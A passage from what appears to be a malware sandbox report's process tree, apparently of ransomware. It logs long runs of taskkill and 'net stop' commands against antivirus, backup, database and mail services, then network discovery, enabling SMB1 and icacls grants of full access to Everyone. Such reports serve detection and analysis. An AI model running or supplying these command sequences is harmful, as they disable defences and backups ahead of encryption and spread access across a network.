  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  PID:10064
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  PID:10056
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  PID:10048
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  PID:10040
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  PID:10008
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  PID:9988
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  PID:9960
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:9944
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  PID:9936
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:9928
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  PID:9916
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  PID:9908
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:9900
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  PID:9892
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  PID:9884
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  PID:9876
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  PID:9868
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  PID:9860
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  PID:9852
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:9844
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  PID:9836
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  PID:9828
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  PID:9820
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:9812
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  PID:9804
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  PID:9796
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:9788
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:9780
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:9772
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  PID:9764
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:9756
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:9748
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:9740
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sms_site_sql_backup /y
  2⤵
  PID:9644
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sms_site_sql_backup /y
    3⤵
    PID:15536
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:8272
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:8256
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:8248
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:8232
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DCAgent /y
  2⤵
  PID:8216
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SHAREPOINT /y
  2⤵
  PID:8208
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:8200
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AVP /y
  2⤵
  PID:7176
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /y
  2⤵
  PID:6956
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /
  2⤵
  PID:5520
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:5432
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Antivirus /y
  2⤵
  PID:5364
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:6488
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:5688
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:6448
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PROD /y
  2⤵
  PID:5524
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:5720
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Web Control Service” /y
  2⤵
  PID:5768
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:8184
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDeviceMediaService /y
  2⤵
  PID:8176
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos System Protection Service” /y
  2⤵
  PID:8168
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:8160
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:8152
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Safestore Service” /y
  2⤵
  PID:8144
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop audioendpointbuilder /y
  2⤵
  PID:8136
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$ECWDB2 /y
  2⤵
  PID:8128
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:8120
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Message Router” /y
  2⤵
  PID:8112
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop unistoresvc_1af40a /y
  2⤵
  PID:8104
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$BKUPEXEC /y
  2⤵
  PID:8096
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ARSM /y
  2⤵
  PID:8088
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos MCS Client” /y
  2⤵
  PID:8080
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop msexchangeimap4 /y
  2⤵
  PID:8072
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “intel(r) proset monitoring service” /y
  2⤵
  PID:8064
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$TPSAMA /y
  2⤵
  PID:8056
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:8048
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos MCS Agent” /y
  2⤵
  PID:8040
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop msexchangeadtopology /y
  2⤵
  PID:8032
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “aphidmonitorservice” /y
  2⤵
  PID:8024
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$TPS /y
  2⤵
  PID:8016
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Zoolz 2 Service” /y
  2⤵
  PID:8008
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$TPSAMA /y
  2⤵
  PID:8000
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Health Service” /y
  2⤵
  PID:7992
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeSRS /y
  2⤵
  PID:7984
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop W3Svc /y
  2⤵
  PID:7976
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:7968
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Veeam Backup Catalog Data Service” /y
  2⤵
  PID:7960
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$TPS /y
  2⤵
  PID:7952
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos File Scanner Service” /y
  2⤵
  PID:7940
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeSA /y
  2⤵
  PID:7928
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop UI0Detect /y
  2⤵
  PID:7920
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$SQL_2008 /y
  2⤵
  PID:7912
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Symantec System Recovery” /y
  2⤵
  PID:7904
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:7896
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Device Control Service” /y
  2⤵
  PID:7880
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeMTA /y
  2⤵
  PID:7872
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SstpSvc /y
  2⤵
  PID:7864
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop msftesql$PROD /y
  2⤵
  PID:7852
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “SQLsafe Filter Service” /y
  2⤵
  PID:7840
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:7832
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SMTPSvc /y
  2⤵
  PID:7824
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Clean Service” /y
  2⤵
  PID:7808
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeMGMT /y
  2⤵
  PID:7800
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop POP3Svc /y
  2⤵
  PID:7792
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MsDtsServer110 /y
  2⤵
  PID:7784
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “SQLsafe Backup Service” /y
  2⤵
  PID:7776
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer /y
  2⤵
  PID:7768
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SamSs /y
  2⤵
  PID:7760
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos AutoUpdate Service” /y
  2⤵
  PID:7752
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeIS /y
  2⤵
  PID:7744
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetMsmqActivator /y
  2⤵
  PID:7736
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MsDtsServer100 /y
  2⤵
  PID:7728
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “SQL Backups /y
  2⤵
  PID:7720
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Enterprise Client Service” /y
  2⤵
  PID:7712
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop vapiendpoint /y
  2⤵
  PID:7704
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mssql$vim_sqlexp /y
  2⤵
  PID:7696
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop WRSVC /y
  2⤵
  PID:7688
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:7680
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TrueKeyServiceHelper /y
  2⤵
  PID:7672
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLTELEMETRY /y
  2⤵
  PID:7664
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TrueKeyScheduler /y
  2⤵
  PID:7656
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLSERVERAGENT /y
  2⤵
  PID:7648
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TrueKey /y
  2⤵
  PID:7640
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop tmlisten /y
  2⤵
  PID:7624
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLBrowser /y
  2⤵
  PID:7616
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TmCCSF /y
  2⤵
  PID:7608
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:7600
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_update_64 /y
  2⤵
  PID:7592
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:7584
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_update /y
  2⤵
  PID:7576
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$TPSAMA /y
  2⤵
  PID:7568
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_service /y
  2⤵
  PID:7560
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$TPS /y
  2⤵
  PID:7552
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_filter /y
  2⤵
  PID:7544
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:7536
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop svcGenericHost /y
  2⤵
  PID:7528
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:7520
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SOPHOS /y
  2⤵
  PID:7512
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SQL_2008 /y
  2⤵
  PID:7504
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophossps /y
  2⤵
  PID:7496
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:7488
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SntpService /y
  2⤵
  PID:7480
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:7472
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SmcService /y
  2⤵
  PID:7464
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:7456
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Smcinst /y
  2⤵
  PID:7448
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PROD /y
  2⤵
  PID:7440
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ShMonitor /y
  2⤵
  PID:7432
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:7424
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SepMasterService /y
  2⤵
  PID:7416
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:7408
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SAVService /y
  2⤵
  PID:7400
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$ECWDB2 /y
  2⤵
  PID:7392
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SAVAdminService /y
  2⤵
  PID:7384
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$CXDB /y
  2⤵
  PID:7376
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sacsvr /y
  2⤵
  PID:7368
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:7360
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SOPHOS /y
  2⤵
  PID:7352
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:7344
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:7336
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mozyprobackup /y
  2⤵
  PID:7328
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ekrn /y
  2⤵
  PID:7320
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:7312
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:7304
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:7296
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:6384
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:5052
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c net view
  2⤵
  PID:7156
- - C:\Windows\system32\net.exe
    net view
    3⤵
    - Discovers systems in the same network
    PID:4988
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
  2⤵
  - Drops file in Windows directory
  PID:5336
- - C:\Users\Admin\AppData\Local\Temp\365FECE8-C059-4E79-A459-DDF51AE721CB\dismhost.exe
    C:\Users\Admin\AppData\Local\Temp\365FECE8-C059-4E79-A459-DDF51AE721CB\dismhost.exe {12B7A492-9760-4EBB-98F3-C7742CA44076}
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    PID:13592
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:15348
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.14
  2⤵
  PID:15940
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpB9FA.bat
  2⤵
  PID:4728
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5816
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" \\10.10.0.14\Users\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4560

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
1⤵
PID:5968

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
1⤵
PID:4956

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:5360

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVService /y
1⤵
PID:9044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
1⤵
PID:9076

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
1⤵
PID:13592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
1⤵
PID:14132

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
1⤵
PID:14120

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
1⤵
PID:14112

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
1⤵
PID:13976

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
1⤵
PID:13968

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
1⤵
PID:13960

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:13952

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
1⤵
PID:13944

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
1⤵
PID:13936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ekrn /y
1⤵
PID:13572

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
1⤵
PID:13564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
1⤵
PID:13556

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
1⤵
PID:13548

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
1⤵
PID:13540

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:13532

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
1⤵
PID:9148

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:6704

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
1⤵
PID:15140

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SntpService /y
1⤵
PID:15132

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
1⤵
PID:15124

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
1⤵
PID:15116

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
1⤵
PID:15108

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
1⤵
PID:15100

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
1⤵
PID:15092

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophossps /y
1⤵
PID:15084

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
1⤵
PID:15076

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
1⤵
PID:15068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
1⤵
PID:15060

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
1⤵
PID:15052

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update /y
1⤵
PID:15044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
1⤵
PID:15036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
1⤵
PID:15028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
1⤵
PID:15020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_service /y
1⤵
PID:15012

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:15004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
1⤵
PID:14996

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
1⤵
PID:14988

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:14980

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
1⤵
PID:14972

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
1⤵
PID:14964

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
1⤵
PID:14956

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Clean Service” /y
1⤵
PID:14948

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
1⤵
PID:14940

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
1⤵
PID:14932

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
1⤵
PID:14924

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SamSs /y
1⤵
PID:14916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
1⤵
PID:14908

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
1⤵
PID:14900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop msexchangeadtopology /y
1⤵
PID:14884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
1⤵
PID:14876

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
1⤵
PID:14868

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “SQL Backups /y
1⤵
PID:14860

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
1⤵
PID:14852

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
1⤵
PID:15720

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
1⤵
PID:15892

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
1⤵
PID:16192

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
1⤵
PID:16332

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
1⤵
PID:16304

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:16288

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
1⤵
PID:16280

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:16272

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:16264

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ARSM /y
1⤵
PID:16256

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
1⤵
PID:16248

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
1⤵
PID:16240

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop unistoresvc_1af40a /y
1⤵
PID:16232

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
1⤵
PID:16224

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
1⤵
PID:16216

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Client” /y
1⤵
PID:16208

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
1⤵
PID:16168

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Health Service” /y
1⤵
PID:16152

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
1⤵
PID:16136

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
1⤵
PID:16128

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
1⤵
PID:16112

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
1⤵
PID:16104

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
1⤵
PID:16096

C:\Windows\system32\net1.exe
